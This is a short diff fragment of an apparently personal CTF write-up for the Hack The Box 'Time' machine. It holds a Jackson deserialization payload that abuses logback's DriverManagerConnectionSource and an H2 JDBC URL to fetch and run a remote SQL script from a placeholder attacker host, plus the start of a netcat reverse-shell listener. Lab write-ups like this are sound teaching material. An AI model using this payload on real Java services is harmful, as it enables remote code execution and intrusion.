x0ld/x0ld.github.io/ctf/hackthebox-time/index.md

 [“ch.qos.logback.core.db.DriverManagerConnectionSource”,{“url”:”jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM ‘http://IP:PORT/inject.sql'”}]
 ```

-and you got a reverseshell
+and you got a reverseshell running as the user pericles.

 ```sh
 listening on [any] 1337 ...